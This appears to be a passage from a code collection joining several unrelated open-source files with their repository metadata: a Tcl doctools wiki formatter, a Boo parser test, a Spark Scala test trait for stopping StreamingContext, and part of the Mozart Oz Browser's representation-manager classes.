[string trim $line]] } else { # Everything else lappend lines [string map {[ [[ ] ]]} [string trimright $line]] } } set wiki [join $lines \n]\n regsub {^[ ]+} $wiki {} wiki return $wiki } proc fmt_plain_text {text} {if {$text != {}} {return \n} else {return {}}} ################################################################ ## Backend for wiki markup proc fmt_toc_begin {label title} {return "Table of Contents '''$label'''\n'''[string trim $title]'''"} proc fmt_toc_end {} {return {}} proc fmt_division_start {title symfile} {return '''[string trim $title]'''} proc fmt_division_end {} {return {}} proc fmt_item {file label desc} {return " \[$label\]: $file -- $desc"} proc fmt_comment {text} {return {}} ################################################################
MediaWiki
4
jdruin/F5Eagle
lib/doctools/mpformats/toc.wiki
[ "TCL" ]
""" class Test: a as int b as int def method1(): a = 1 def method2(): pass """ class Test: a as int b as int def method1(): a = 1 // b = 1 end def method2(): end end
Boo
2
popcatalin81/boo
tests/testcases/parser/wsa/comments-2.boo
[ "BSD-3-Clause" ]
/* * Licensed to the Apache Software Foundation (ASF) under one or more * contributor license agreements. See the NOTICE file distributed with * this work for additional information regarding copyright ownership. * The ASF licenses this file to You under the Apache License, Version 2.0 * (the "License"); you may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.apache.spark.streaming import org.scalatest.{BeforeAndAfterEach, Suite} import org.apache.spark.SparkContext import org.apache.spark.internal.Logging /** * Manages a local `ssc` `StreamingContext` variable, correctly stopping it after each test. * Note that it also stops active SparkContext if `stopSparkContext` is set to true (default). * In most cases you may want to leave it, to isolate environment for SparkContext in each test. */ trait LocalStreamingContext extends BeforeAndAfterEach { self: Suite => @transient var ssc: StreamingContext = _ @transient val stopSparkContext: Boolean = true override def afterEach(): Unit = { try { resetStreamingContext() } finally { super.afterEach() } } def resetStreamingContext(): Unit = { LocalStreamingContext.stop(ssc, stopSparkContext) ssc = null } } object LocalStreamingContext extends Logging { def stop(ssc: StreamingContext, stopSparkContext: Boolean): Unit = { try { if (ssc != null) { ssc.stop(stopSparkContext = stopSparkContext) } } finally { if (stopSparkContext) { ensureNoActiveSparkContext() } } } /** * Clean up active SparkContext: try to stop first if there's an active SparkContext. * If it fails to stop, log warning message and clear active SparkContext to avoid * interfere between tests. */ def ensureNoActiveSparkContext(): Unit = { // if SparkContext is still active, try to clean up SparkContext.getActive match { case Some(sc) => try { sc.stop() } catch { case e: Throwable => logError("Exception trying to stop SparkContext, clear active SparkContext...", e) SparkContext.clearActiveContext() throw e } case _ => } } }
Scala
5
kesavanvt/spark
streaming/src/test/scala/org/apache/spark/streaming/LocalStreamingContext.scala
[ "BSD-2-Clause", "Apache-2.0", "CC0-1.0", "MIT", "MIT-0", "ECL-2.0", "BSD-3-Clause-No-Nuclear-License-2014", "BSD-3-Clause" ]
%%% %%% Authors: %%% Konstantin Popov %%% %%% Copyright: %%% Konstantin Popov, 1997 %%% %%% Last change: %%% $Date$ by $Author$ %%% $Revision$ %%% %%% This file is part of Mozart, an implementation %%% of Oz 3 %%% http://www.mozart-oz.org %%% %%% See the file "LICENSE" or %%% http://www.mozart-oz.org/LICENSE.html %%% for information on usage and redistribution %%% of this file, and for a DISCLAIMER OF ALL %%% WARRANTIES. %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%% %%% %%% Representation manager %%% %%% - keeps track of a term's representation structure; %%% - performs all the "draw" work; %%% %%% %%% local %% MetaRepManagerObject % some generic functionality; %% %% Local features & attributes; HeadMark = {NewName} TailMark = {NewName} HaveBraces = {NewName} Size = {NewName} SavedSize = {NewName} UsedIndentIn = {NewName} UsedIndentOut = {NewName} RefName = {NewName} RefNameSize = {NewName} %% %% ... methods; OpenRep = {NewName} ShutRep = {NewName} %% PutHeadMark = {NewName} PutTailMark = {NewName} %% LayoutOK = {NewName} LayoutWrong = {NewName} %% AnchorLB = {NewName} %% %% 'SetCursorAt' has global extent - it has to be used by %% 'RootTermObject'; SetCursorAfter = {NewName} %% SkipAuxBegin = {NewName} SkipAuxEnd = {NewName} GetAuxSize = {NewName} GetAuxSizeB = {NewName} GetAuxSizeE = {NewName} %% PutOP = {NewName} PutCP = {NewName} %% GetSize = {NewName} GetIndentIn = {NewName} GetIndentOut = {NewName} IsMultiLined = {NewName} %% %% Auxiliary procedures & objects; CreateSpaces ScanToken in %%% %%% %%% Diverse local auxiliary procedures; %%% %%% %% %% 'CreateSpaces'; %% Generates a VS consisting of 'N' blanks (and the code itself %% could be considered as my (K.P.) joke:); %% %% The curious thing is that Tcl interpreter (wish) is damn slow, %% so it pays off to generate strings etc. at the Oz side and %% transmit it to the wish, compared to an iterative "space %% maker" written in Tcl and executed directly by wish! fun {CreateSpaces N} case N of 0 then '' [] 1 then ' ' [] 2 then ' ' [] 3 then ' ' [] 4 then ' ' [] 5 then ' ' [] 6 then ' ' [] 7 then ' ' [] 8 then ' ' [] 9 then ' ' [] 10 then ' ' [] 11 then ' ' [] 12 then ' ' [] 13 then ' ' [] 14 then ' ' [] 15 then ' ' [] 16 then ' ' [] 17 then ' ' [] 18 then ' ' [] 19 then ' ' [] 20 then ' ' [] 21 then ' ' [] 22 then ' ' [] 23 then ' ' [] 24 then ' ' [] 25 then ' ' [] 26 then ' ' [] 27 then ' ' [] 28 then ' ' [] 29 then ' ' [] 30 then ' ' [] 31 then ' ' [] 32 then ' ' [] 33 then ' ' [] 34 then ' ' [] 35 then ' ' [] 36 then ' ' [] 37 then ' ' [] 38 then ' ' [] 39 then ' ' [] 40 then ' ' [] 41 then ' ' [] 42 then ' ' [] 43 then ' ' [] 44 then ' ' [] 45 then ' ' [] 46 then ' ' [] 47 then ' ' [] 48 then ' ' [] 49 then ' ' [] 50 then ' ' else H V in H = N div 2 if H + H == N then V = {CreateSpaces H} V # V else V = {CreateSpaces H} ' ' # V # V end end end %% %% An object which helps to implement iteration over groups in %% 'AnchorGroup': a virtual token (marker) moving backward from %% the position we are interested in. So, offsets & indents are %% accumulated "backwards", i.e. from larger groups to smaller %% ones; class ScanToken from Object.base attr mark: InitValue % none at the begin; offset: 0 % originallt - 0; gotIndent: false % ... originally; indent: 0 % %% meth init skip end %% meth gotMark($) @mark \= InitValue end meth setMark(Mark) mark <- Mark end meth incOffset(Inc) offset <- @offset + Inc end meth setMarkIncOffset(Mark Inc) mark <- Mark offset <- @offset + Inc end %% meth gotIndent($) @gotIndent end meth incIndent(Inc) indent <- @indent + Inc end meth setIndent(Inc) indent <- @indent + Inc gotIndent <- true end %% %% use our results ... meth setCursorAt(WO) {WO setCursorOffset(@mark @offset @indent)} \ifdef DEBUG_RM % Object.closable , close \endif end %% end %% %% This guy is used by the Browser's manager object, in order to %% figure out which term object has to handle an event. %% %% 'Pairs' is a list of '(Type,Obj)' pairs; %% local SplitPairs GetInnerMostObj GetOuterMostObj in fun {GetTargetObj Pairs} local LObjs RObjs in %% {SplitPairs Pairs LObjs RObjs} %% if LObjs \= nil then {GetInnerMostObj LObjs} elseif RObjs \= nil then {GetOuterMostObj RObjs}.ParentObj else \ifdef DEBUG_RM {BrowserWarning 'GetTargetObj: no objects??!'} \endif InitValue end end end %% proc {SplitPairs Pairs ?LeftObjs ?RightObjs} case Pairs of nil then LeftObjs = RightObjs = nil [] E|T then NewLeftObjs NewRightObjs Type Obj in E = Type#Obj case Type of left then LeftObjs = Obj|NewLeftObjs RightObjs = NewRightObjs [] right then LeftObjs = NewLeftObjs RightObjs = Obj|NewRightObjs else {BrowserError 'GetTargetObj: unknown type of a object!'} LeftObjs = NewLeftObjs RightObjs = NewRightObjs end %% {SplitPairs T NewLeftObjs NewRightObjs} else {BrowserError 'GetTargetObj: a list of pairs??!'} end end %% %% These algorithms are quadratic, but the length of lists is %% limited by the number of different term infix constructors; %% %% 'Objs' is a non-empty list, for both functions; %% fun {GetOuterMostObj Objs} case {Filter Objs fun {$ Obj} % 'has no parent'; {Some Objs fun {$ CmpObj} Obj.ParentObj == CmpObj end} == false end} of nil then {BrowserError 'GetTargetObj: no outer-most object??!'} InitValue [] Obj|_ then Obj end end %% fun {GetInnerMostObj Objs} case {Filter Objs fun {$ Obj} % 'has no child(ren)'; {Some Objs fun {$ CmpObj} CmpObj.ParentObj == Obj end} == false end} of nil then {BrowserError 'GetTargetObj: no inner-most object??!'} InitValue [] Obj|_ then Obj end end %% end %%% %%% %%% %%% %%% %% %% Generic; %% class MetaRepManagerObject %% feat !WidgetObj % !HeadMark % !TailMark % %% attr !HaveBraces: false !Size: 0 !SavedSize: 0 !UsedIndentIn: InitValue %% !RefName: '' !RefNameSize: 0 % ... and its size together with '='; \ifdef DEBUG_RM meth debugShow {Show 'DEBUG: RM::debugShow'} {Show 'Size, SavedSize, UsedIndentIn' # @Size # @SavedSize # @UsedIndentIn} end \endif %% %% This is "enough" for pritivie term objects, and could be %% extended for compound ones; %% %% Note that drawing starts at the current cursor's position, %% and after 'MakeRep' the cursor stay just at the end of a %% representation built up; %% meth !MakeRep(isEnc:IsEncRep) \ifdef DEBUG_RM {Show 'MetaRepManagerObject::MakeRep is applied'} \endif %% local WidgetObjIn in WidgetObjIn = self.WidgetObj = self.ParentObj.WidgetObj %% UsedIndentIn <- {WidgetObjIn getCursorCol($)} %% %% they can be implemented differently for %% primitive/compound term objects; {self PutHeadMark} %% %% 'Size'/'SavedSize' are initialized already; %% if IsEncRep then MetaRepManagerObject , PutOP end %% {self makeTerm} {self AnchorLB} %% if IsEncRep then MetaRepManagerObject , PutCP end %% {self PutTailMark} {self LayoutOK} end \ifdef DEBUG_RM {Show 'MetaRepManagerObject::MakeRep is finished'} {self debugShow} {self.WidgetObj debugShowIndices(self.HeadMark self.TailMark)} \endif end %% %% remove a representation (everything between 'head' and %% 'tail' marks), and unset marks; meth !CloseRep \ifdef DEBUG_RM {Show 'MetaRepManagerObject::CloseRep is applied'} \endif %% local HM TM in HM = self.HeadMark TM = self.TailMark %% {self.WidgetObj [deleteRegion(HM TM) unsetMark(HM) unsetMark(TM) flushUnsetMarks]} end \ifdef DEBUG_RM {Show 'MetaRepManagerObject::CloseRep is finished'} \endif end %% %% ... unset marks only. This is to be used by an object that %% is a child of another closed object; meth !FastCloseRep \ifdef DEBUG_RM {Show 'MetaRepManagerObject::FastCloseRep is applied'} \endif %% {self.WidgetObj [unsetMark(self.HeadMark) unsetMark(self.TailMark)]} \ifdef DEBUG_RM {Show 'MetaRepManagerObject::FastCloseRep is finished'} \endif end %% %% 'BeginUpdate'/'EndUpdate' group. %% %% %% Basic '{Begin,End}Update': swapping marks gravity; meth !OpenRep %% {self.WidgetObj [setMarkGravity(self.HeadMark left) setMarkGravity(self.TailMark right)]} end meth !ShutRep %% {self.WidgetObj [setMarkGravity(self.HeadMark right) setMarkGravity(self.TailMark left)]} end %% %% Toggle the mark gravities, and save the current size; meth !BeginUpdate \ifdef DEBUG_RM {Show 'MetaRepManagerObject::BeginUpdate is applied'} \endif %% SavedSize <- @Size %% {self.ParentObj BeginUpdateSubterm(self.numberOf)} %% MetaRepManagerObject , OpenRep %% \ifdef DEBUG_RM {Show 'MetaRepManagerObject::BeginUpdate is finished'} \endif end %% %% ... toggle gravities back, and apply 'SizeChanged' whenever %% size has changed; meth !EndUpdate \ifdef DEBUG_RM {Show 'MetaRepManagerObject::EndUpdate is applied'} \endif %% local OldSize NewSize in OldSize = @SavedSize NewSize = @Size %% {self.ParentObj EndUpdateSubterm(self.numberOf)} %% MetaRepManagerObject , ShutRep %% ControlObject , SizeChanged(OldSize NewSize) %% MetaRepManagerObject , LayoutWrong end \ifdef DEBUG_RM {Show 'MetaRepManagerObject::EndUpdate is finished'} {self debugShow} {self.WidgetObj debugShowIndices(self.HeadMark self.TailMark)} \endif end %% %% per definition; meth !IsMultiLined($) false end %% %% %% Parentheses & reference names; %% %% meth !IsEnc(are:$) @HaveBraces end meth !GetRefName($) @RefName end %% %% meth !PutRefName(refName: RefNameIn) \ifdef DEBUG_RM {Show 'MetaRepManagerObject::PutRefName is applied '} if @RefName \= '' then {BrowserError 'RepManagerObject::PutRefName: error!'} end \endif %% {self SetCursorAt} {self SkipAuxBegin} %% RefName <- RefNameIn RefNameSize <- {self.WidgetObj insert((RefNameIn # DEqualS) $)} Size <- @Size + @RefNameSize %% \ifdef DEBUG_RM {Show 'MetaRepManagerObject::PutRefName is finished '} \endif end %% %% meth !PutEncRefName(refName: RefNameIn) \ifdef DEBUG_RM {Show 'MetaRepManagerObject::PutEncRefName is applied'} if @RefName \= '' then {BrowserError 'RepManagerObject::PutEncRefName: error!'} end \endif %% {self SetCursorAt} {self PutOP} %% RefName <- RefNameIn RefNameSize <- {self.WidgetObj insert((RefNameIn # DEqualS) $)} Size <- @Size + @RefNameSize %% {self SetCursorAfter} {self PutCP} \ifdef DEBUG_RM {Show 'MetaRepManagerObject::PutEncRefName is finished'} \endif end %% %% Local methods (for the representation manager); %% %% %% Declares the term's layout to be a correct one (when starting %% at 'UsedIndentIn', of course); meth !LayoutOK SavedSize <- @Size end %% meth !LayoutWrong SavedSize <- 0 end %% %% Forces subsequent 'CheckLayout' to perform the check; meth !CheckLayoutReq skip end %% meth !GetSize($) @Size end meth !GetIndentIn($) @UsedIndentIn end meth !GetIndentOut($) @UsedIndentIn + @Size end %% %% meth !PutOP \ifdef DEBUG_RM {Show 'RepManagerObject::PutOP is applied'} if @HaveBraces then {BrowserError 'RepManagerObject::PutOP: error!'} end \endif %% Size <- @Size + {self.WidgetObj insert(DLRBraceS $)} %% HaveBraces <- true \ifdef DEBUG_RM {Show 'RepManagerObject::PutOP is finished'} \endif end %% %% meth !PutCP \ifdef DEBUG_RM {Show 'RepManagerObject::PutCP is applied'} \endif %% Size <- @Size + {self.WidgetObj insert(DRRBraceS $)} \ifdef DEBUG_RM {Show 'RepManagerObject::PutCP is finished'} \endif end %% %% Skip open parenthesis and reference name, if any; meth !SkipAuxBegin local WO RNSize in WO = self.WidgetObj RNSize = @RefNameSize %% if @HaveBraces then {WO advanceCursor(RNSize + DSpace)} % at least DSpace; elseif RNSize == 0 then skip % no parentheses; else {WO advanceCursor(RNSize)} end end end %% %% Skip a closing parenthesis, if any; meth !SkipAuxEnd %% if @HaveBraces then {self.WidgetObj advanceCursor(DSpace)} end end %% meth !GetAuxSize($) @RefNameSize + if @HaveBraces then DDSpace else 0 end end %% meth !GetAuxSizeB($) @RefNameSize + if @HaveBraces then DSpace else 0 end end %% meth !GetAuxSizeE($) if @HaveBraces then DSpace else 0 end end %% %% jump(view) to a first character of a representation; meth pickPlace(Where How) {self.WidgetObj pickMark(case Where of 'begin' then self.HeadMark else self.TailMark end How)} end %% meth scrollTo {self.WidgetObj scrollToMark(self.TailMark)} end %% meth !SetCursorAt {self.WidgetObj setCursor(self.HeadMark @UsedIndentIn)} end %% meth !Highlight {self.WidgetObj highlightRegion(self.HeadMark self.TailMark)} end %% end %% %% ... for primitive objects; %% class RepManagerObject from MetaRepManagerObject %% %% %% Note that there is no need for 'UsedIndentOut' since it is a %% sum of 'UsedIndentIn' and 'Size'; %% %% %% meth !PutHeadMark %% %% Originally, nothing is put at all: we can place it every %% time later (but before 'MakeRep' completes, of course); skip end %% meth !PutTailMark local WO in WO = self.WidgetObj %% %% Now, put both: the leading one with the default right %% gravity, and the tail one - with the left one: self.HeadMark = {WO putMarkBefore(@Size left#self $)} self.TailMark = {WO putMark(left right#self $)} end end %% %% meth insert(str:Str) \ifdef DEBUG_RM {Show 'RepManagerObject::insert is applied'} \endif %% Size <- @Size + {self.WidgetObj insert(Str $)} %% \ifdef DEBUG_RM {Show 'RepManagerObject::insert is finished'} \endif end %% %% meth replace(str:Str) \ifdef DEBUG_RM {Show 'RepManagerObject::replace is applied'} \endif %% local WO AuxSize in WO = self.WidgetObj %% %% 'AuxSize' is the total size of prefixes and suffixes; AuxSize = MetaRepManagerObject , GetAuxSize($) %% %% remove everything else, i.e. the proper representation; Size <- AuxSize + {WO [deleteBackward(@Size - AuxSize) insert(Str $)]} end %% \ifdef DEBUG_RM {Show 'RepManagerObject::replace is finished'} \endif end %% meth !BeginUpdate %% %% this is to do anyway; MetaRepManagerObject , BeginUpdate %% %% ... and now, set the cursor at the begin: a kind of %% 'block(0)' emulation: {self SetCursorAt} {self SkipAuxBegin} {self.WidgetObj advanceCursor(@Size)} end %% %% So, 'Size' attribute should carry a right value; meth !SetCursorAfter {self.WidgetObj setCursor(self.TailMark (@UsedIndentIn + @Size))} end %% %% Its semantic is to move after the last group in the last %% block. But we have only one :-)) meth !AnchorLB \ifdef DEBUG_RM if MetaRepManagerObject , GetAuxSize($) == @Size then {BrowserError 'RepManagerObject: a primitive term cannot be empty!!!'} end \endif skip end %% %% Basically, there is nothing to do except to set a new %% 'indent-in' value. 'IndentOut' is a sum of 'IndentIn' and a %% term's size per definition of the term size; %% %% Note that this is correct only for primitive terms. For %% compound terms, 'IndentOut' is different from that sum, of %% course. meth !CheckLayout(IndentIn ?IndentOut) UsedIndentIn <- IndentIn IndentOut = IndentIn + @Size end %% end %% %% ... for compound objects; %% class CompoundRepManagerObject from MetaRepManagerObject %% %% feat %% subterm objects; Subterms % %% attr !UsedIndentOut: InitValue CurrentBlock: 0 % 'MakeRep' make an empty zeroth group; MaxBlock: 0 % %% %% meth !MakeRep(isEnc:IsEncRep) \ifdef DEBUG_RM {Show 'CompoundRepManagerObject::MakeRep is applied'} \endif %% self.Subterms = {Dictionary.new} %% %% the zeroth block will be created anyway; {Dictionary.put self.Subterms 0 0} %% MetaRepManagerObject , MakeRep(isEnc:IsEncRep) \ifdef DEBUG_RM {Show 'CompoundRepManagerObject::MakeRep is finished'} \endif end %% %% meth !PutHeadMark %% %% originally (while drawing first time) it has left %% gravity, aka inside 'BeginUpdate'/'EndUpdate'; self.HeadMark = {self.WidgetObj putMark(left left#self $)} end %% meth !PutTailMark %% %% Note that this is essential that the tail mark is put %% at the end. Otherwise, multiple (O(term depth)) tail %% marks must be moved by the wish process each time some %% new strings is inserted in, what is inefficient. self.TailMark = {self.WidgetObj [setMarkGravity(self.HeadMark right) putMark(left right#self $)]} end %% %% 'GetSize'/'GetIndentIn' are inherited; meth !GetIndentOut($) @UsedIndentOut end %% meth !SetCursorAt MetaRepManagerObject , SetCursorAt CurrentBlock <- InitValue end %% %% [local;] meth !SetCursorAfter {self.WidgetObj setCursor(self.TailMark @UsedIndentOut)} CurrentBlock <- InitValue end %% meth !CloseRep \ifdef DEBUG_RM {Show 'CompoundRepManagerObject::CloseRep is applied'} \endif %% CompoundRepManagerObject , UnsetMarks %% %% This way around - unset glue marks, after that - subterm' %% and self marks, and flush them; MetaRepManagerObject , CloseRep %% %% Note: don't drop the subterms dictionary, because it's %% still needed! \ifdef DEBUG_RM {Show 'CompoundRepManagerObject::CloseRep is finished'} \endif end %% meth !FastCloseRep \ifdef DEBUG_RM {Show 'CompoundRepManagerObject::FastCloseRep is applied'} \endif %% CompoundRepManagerObject , UnsetMarks %% MetaRepManagerObject , FastCloseRep \ifdef DEBUG_RM {Show 'CompoundRepManagerObject::FastCloseRep is applied'} \endif end %% meth !CheckLayoutReq CompoundRepManagerObject , LayoutWrong CompoundRepManagerObject , ApplySubtermObjs(message:CheckLayoutReq) end %% meth !BeginUpdate \ifdef DEBUG_RM {Show 'CompoundRepManagerObject::BeginUpdate is applied'} \endif %% MetaRepManagerObject , BeginUpdate \ifdef DEBUG_RM {Show 'CompoundRepManagerObject::BeginUpdate is finished'} \endif end %% %% {Begin,End}UpdateSubterm groups - for recursive preparing %% for updating; meth !BeginUpdateSubterm(N) \ifdef DEBUG_RM {Show 'CompoundRepManagerObject::BeginUpdateSubterm is applied' # N} \endif %% {self.ParentObj BeginUpdateSubterm(self.numberOf)} %% MetaRepManagerObject , OpenRep %% CompoundRepManagerObject , XXXUpdateSubterm(N left) %% \ifdef DEBUG_RM {Show 'CompoundRepManagerObject::BeginUpdateSubterm is finished'} \endif end %% meth !EndUpdateSubterm(N) \ifdef DEBUG_RM {Show 'CompoundRepManagerObject::EndUpdateSubterm is applied' # N} \endif %% {self.ParentObj EndUpdateSubterm(self.numberOf)} %% MetaRepManagerObject , ShutRep %% CompoundRepManagerObject , XXXUpdateSubterm(N right) %% \ifdef DEBUG_RM {Show 'CompoundRepManagerObject::EndUpdateSubterm is finished'} \endif end %% %% It's available internally because whenever updating is going %% recursively ('UpdateSize'), then each of subterms must be %% prepared for that; meth XXXUpdateSubterm(FN Gravity) local Group B N in FN = B#N %% Group = CompoundRepManagerObject , GetGroup(b:B ln:N group:$) %% if case {Label Group} of e then false [] t then false [] s then false [] st then false [] sgs then true [] sgt then true [] gs then true [] gt then true else {BrowserError '...::*UpdateSubterm: group type??!'} false end then {self.WidgetObj setMarkGravity(Group.mark Gravity)} end end end %% meth !EndUpdate \ifdef DEBUG_RM {Show 'CompoundRepManagerObject::EndUpdate is applied'} \endif MetaRepManagerObject , EndUpdate %% %% after 'BeginUpdate' one has to specify a block again; CurrentBlock <- InitValue \ifdef DEBUG_RM {Show 'CompoundRepManagerObject::EndUpdate is finished'} \endif end %% %% ... that is, it would not fit within a single line; meth !IsMultiLined($) @Size > @UsedIndentOut - @UsedIndentIn end %% %% ... when a term's representation has been built up (by %% 'makeTerm'), it's not guaranteed that cursor stays after the %% last group; meth !AnchorLB \ifdef DEBUG_RM {Show 'CompoundRepManagerObject::AnchorLB is applied'} \endif %% %% there are two cases: %% (a) the current block is the last one, then this is ok. %% (b) the current block is not a last one, then we use the %% 'AnchorGroup' method (see comments in the 'block' %% method); %% if @CurrentBlock \= @MaxBlock then B N in %% if CompoundRepManagerObject , GetLastGroup(b:B ln:N found:$) then CompoundRepManagerObject , AnchorGroup(b:B ln:N) else {BrowserError 'CompoundRepManagerObject: There must be a group!!!'} end end %% \ifdef DEBUG_RM {Show 'CompoundRepManagerObject::AnchorLB is finished'} \endif end %% meth !LayoutOK \ifdef DEBUG_RM {Show 'CompoundRepManagerObject::LayoutOK is applied'} \endif MetaRepManagerObject , LayoutOK %% %% Trust it. It's updated during 'CheckLayout' (if ever %% necessary); %% %% 'UsedIndentOut' must either contain a correct value, or %% the term's layout must be checked in the futher (when a %% correct value will be recomputed). %% %% This is essential for making 'CheckLayout' correct: if a %% 'self's layout is NOT checked, and a wrong 'indent-out' %% is returned, this will lead to a wrong layout of all %% subsequent subterms in a parent term object. UsedIndentOut <- {self.WidgetObj getCursorCol($)} \ifdef DEBUG_RM {Show 'CompoundRepManagerObject::LayoutOK is finished'} \endif end %%% %%% Basic "subterms" primitives - create a block, add a group, %%% read/add/update a group, etc. %%% %%% %% %% Declares a block - that is, %% (a) sets the 'CurrentBlock' attribute, %% (b) initializes it if it's a new one, %% (c) sets the cursor so that subsequent groups created by %% 'putG' appear at a right place; %% %% Note that this is the only way to set the 'CurrentBlock', and %% this *must* be the case because 'block' uses the previous %% value for deciding whether the cursor should be moved, and %% how it should be moved. On the other hand, each time the %% cursor is touched by some other primitives, the 'CurretBlock' %% must be dropped (and set by 'block' again later, if %% necessary). Of course, the 'CurrentBlock' is also dropped %% when 'EndUpdate'; %% %% Basically, there are four cases in setting the cursor: %% 1. The same block is entered again. From the user's %% perspective, that's bogus, but not forbidden. Internally, %% this is heavely used - since 'MakeRep' sets the current %% block# to zero - to avoid subsequent cursor movements; %% 2. A new, non-zeroth block is declared, and a previously %% used one is a direct predecessor of it - then a new block %% is created, but cursor is not touched; %% 3. A new, non-zeroth block is declared, but a previous one %% is NOT a direct predecessor of it - then a nearest smaller %% group (that might be of other than a direct predecessor %% block!) should be taken, and cursor set after it). A new %% block is created as ususal. %% 4. A used, non-zeroth block is declared. There are three %% further subcases: %% (a) if a previous used block is a direct predecessor %% and the block itself is empty, then the cursor is not %% touched; %% (b) ... in general - the cursor is set after the nearest %% smaller group; %% (c) ... and if there is none, anchor to the leading mark; %% meth block(N) \ifdef DEBUG_RM {Show 'CompoundRepManagerObject::block: ' # N} local NoBlock CM in NoBlock = {NewName} CM = {Dictionary.condGet self.Subterms N * DInfinite NoBlock} %% %% that is, a new block cannot be created after a %% non-existing one; if N < 0 orelse CM == NoBlock andthen N \= @MaxBlock + 1 then {BrowserError 'CompoundRepManagerObject::block: out of order!'} end end \endif %% local PrevBlock Base in PrevBlock = @CurrentBlock Base = N * DInfinite %% if N == PrevBlock then skip %% #1: stay at the place; elseif N > @MaxBlock then % N > 0; %% #2 & #3: a new block to be created; %% if PrevBlock == N - 1 then skip %% #2': don't touch the cursor; else PB in % N > 0; %% #3': some other block - move cursor? %% if CompoundRepManagerObject , GetPrevBlock(sb:N-1 b:PB found:$) then PLN in %% PLN = {Dictionary.get self.Subterms PB*DInfinite} %% %% We have to anchor to a rightmost position of a %% nearest previous group. ... oops, we use here %% that beast: %% step backward through blocks and groups %% until some mark is found. Accumulated %% 'Offset' (i.e. the distance from a mark %% found to a place we refer) and 'Indent' %% (i.e. the column number of a place we %% refer) are collected. As a result, the %% position we want to refer is "<Mark> + %% <Offset> chars", and 'Indent' is its %% column#; CompoundRepManagerObject , AnchorGroup(b:PB ln:PLN) else %% %% still empty - can occur only when the %% representation is drawn the first time - %% after that there *must* be some group; {BrowserError 'CompoundRepManagerObject::block: no groups??!'} end end %% %% #2'' & #3'': ... in any case, a new block is created; {Dictionary.put self.Subterms Base 0} MaxBlock <- N else % @MaxBlock >= N > 0 %% #4: a used block; %% %% Do we enter a (still) empty block after a direct %% predecessor? This is a frequent case where cursor %% movement can be avoided; if PrevBlock == N - 1 andthen {Dictionary.get self.Subterms Base} == 0 then skip else PB in %% if CompoundRepManagerObject , GetPrevBlock(sb:N b:PB found:$) then PLN in %% %% ... the general case: step backwards, but from %% the given block itself: PLN = {Dictionary.get self.Subterms PB*DInfinite} %% CompoundRepManagerObject , AnchorGroup(b:PB ln:PLN) else %% %% still empty but since it's a used block - %% i.e. not the last one - then it can happen %% that there are no groups before. Anchor to %% the begin; {self SetCursorAt} {self SkipAuxBegin} end end end %% CurrentBlock <- N end %% \ifdef DEBUG_RM {Show 'CompoundRepManagerObject::block is finished'} \endif end %% meth getBlock($) @CurrentBlock end %% %% yields 'true' if there is a group 'FN'; meth isGroup(b:B ln:LN is:$) \ifdef DEBUG_RM {Show 'CompoundRepManagerObject::isGroup: ' # B#LN} \endif %% {Dictionary.member self.Subterms (B*DInfinite + LN)} end %% %% Stores a new group within a last declared block. 'N' must be %% a next "free slot" in that block; meth StoreNewGroup(ln:LN group:Group) \ifdef DEBUG_RM {Show 'CompoundRepManagerObject::StoreNewGroup: ' # @CurrentBlock # LN # Group} local NoBlock CB Base CM in NoBlock = {NewName} CB = @CurrentBlock Base = if {Int.is CB} then (CB * DInfinite) else NoBlock end CM = {Dictionary.condGet self.Subterms Base NoBlock} %% if CB == InitValue orelse CM == NoBlock then {BrowserError 'CompoundRepManagerObject::StoreNewGroup: no block!'} elseif CM + 1 \= LN then {BrowserError 'CompoundRepManagerObject::StoreNewGroup: out of order!'} end end \endif local Base in Base = @CurrentBlock * DInfinite %% %% Currently, all groups - of all blocks - are stored in a %% single dictionary, with offsets DInfinite from each %% other (that's the source for the 'width' limitation). %% Since groups are numbered from 1 up, the "zeroth" slot %% is used to keep the highest group number within a %% block; {Dictionary.put self.Subterms (Base + LN) Group} {Dictionary.put self.Subterms Base LN} end end %% meth ReplaceGroup(b:B ln:LN group:Group) \ifdef DEBUG_RM {Show 'CompoundRepManagerObject::ReplaceGroup: ' # B # LN # Group} local NoBlock Base CM in NoBlock = {NewName} Base = if {Int.is B} then (B * DInfinite) else NoBlock end CM = {Dictionary.condGet self.Subterms Base NoBlock} %% if B < 0 orelse B > @MaxBlock orelse CM == NoBlock then {BrowserError 'CompoundRepManagerObject::ReplaceGroup: no block!'} elseif LN < 1 orelse LN > CM then {BrowserError 'CompoundRepManagerObject::ReplaceGroup: no group!'} end end \endif %% {Dictionary.put self.Subterms (B*DInfinite + LN) Group} end %% meth GetGroup(b:B ln:LN group:$) \ifdef DEBUG_RM {Show 'CompoundRepManagerObject::GetGroup: ' # B # LN} local NoBlock Base CM in NoBlock = {NewName} Base = if {Int.is B} then (B * DInfinite) else NoBlock end CM = {Dictionary.condGet self.Subterms Base NoBlock} %% if B < 0 orelse B > @MaxBlock orelse CM == NoBlock then {BrowserError 'CompoundRepManagerObject::GetGroup: no block!'} elseif LN < 1 orelse LN > CM then {BrowserError 'CompoundRepManagerObject::GetGroup: no group!'} end end \endif %% {Dictionary.get self.Subterms (B*DInfinite + LN) $} end %% meth RemoveLastGroup \ifdef DEBUG_RM {Show 'CompoundRepManagerObject::RemoveLastGroup: '} local NoBlock CB Base CM in NoBlock = {NewName} CB = @CurrentBlock Base = if {Int.is CB} then (CB * DInfinite) else NoBlock end CM = {Dictionary.condGet self.Subterms Base NoBlock} %% if CB == InitValue orelse CM == NoBlock then {BrowserError 'CompoundRepManagerObject::RemoveLastGroup: no block!'} elseif CM < 1 then {BrowserError 'CompoundRepManagerObject::RemoveLastGroup: no group!'} end end \endif local Base CM in Base = @CurrentBlock * DInfinite CM = {Dictionary.get self.Subterms Base} %% {Dictionary.remove self.Subterms (Base + CM)} {Dictionary.put self.Subterms Base (CM - 1)} end end %% meth !GetObjG(b:B ln:LN obj:$) \ifdef DEBUG_RM {Show 'CompoundRepManagerObject::GetObjG' # (B#LN)} \endif %% (CompoundRepManagerObject , GetGroup(b:B ln:LN group:$)).obj end %% meth getTermG(fn:FN term:$) 